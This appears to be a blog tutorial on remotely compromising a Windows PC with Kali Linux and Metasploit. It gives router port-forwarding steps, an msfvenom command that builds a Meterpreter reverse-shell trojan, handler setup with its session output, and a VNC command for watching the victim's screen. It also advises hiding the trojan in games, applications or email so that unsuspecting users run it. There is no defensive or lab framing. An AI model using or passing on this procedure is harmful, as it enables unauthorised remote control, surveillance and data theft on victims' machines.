How to hack windows using kali linux remotely with metasploit – 2017
Router Configuration
This step is very important when your target is over the internet or WAN. Ignore this step if your target is on same LAN. To hack a pc over the internet means you have to communicate in both direction. To do this, your router/modem should open a port of your machine. This is called port forwarding. By default all ports are closed by your router/modem. Open a browser go to url http://192.168.1.1 Type in your username and password (by default password and username will be “admin“). This will take you to the router settings. Go to Advanced settings find port forwarding. Now click on add new set the start and end port to 444 (since we are using port 444 on metasploit). In the Ip address field you must type in your linux machine’s internal ip. Save settings. you are done. You can double check by scanning your port with online port scanners.
Generate the Trojan
Generate the payload using msfvenom. set the port to 444 and ip to your public IP or local IP depending on your target.The generated trojan will try to connect to This IP and port when its executed. following command will generate the trojan in .exe format.
# msfvenom -p windows/meterpreter/reverse_tcp — platform windows-a x86 -f exe LHOST=“attacker ip” LPORT=444 -o /root/Desktop/trojan.exe
A trojan will be generated in the desktop. keep it aside and move on to handler section. fire up metasploit and follow the steps.
# msfconsole
Wait for a minute, msfconsole will come up. Use handler then, set payload and port.
1. Handler
msf> use multi/handler
2. set payload
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
3. Set local port
msf exploit(handler) > set LPORT 444
4. Set local host
msf exploit(handler) > set LHOST “attacker ip”
5. exploit
msf exploit(handler) > exploit Wait for the target to connect back
msf exploit(handler) > exploit [*] Started reverse handler on 192.168.1.104:444 [*] Starting the payload handler…
Execute the payload
Now you have to execute your trojan on the target system. Distributing the raw exe file is a bad idea, better encode it and attach with a normal application or a game or even email. once out trojan is in and executed a meterpreter session will be spawned. [*] Started reverse handler on 192.168.1.104:444 [*] Starting the payload handler… [*] Sending stage (83170 bytes) to 192.168.1.105 [*] Meterpreter session 1 opened (192.168.1.104:444 -> 192.168.1.105:36028) at 2016-05-20 03:20:45 -0500 meterpreter >
Meterpreter session allows you to execute system commands, networking commands, spy the screen and much more. use help command to see the whole list of commands
meterpreter > help
Use this command to run vnc session and spy the target
meterpreter > run vnc
This whole process is simple but, the toughest part is getting the trojan in to the target user. Attaching the file along with games works great.
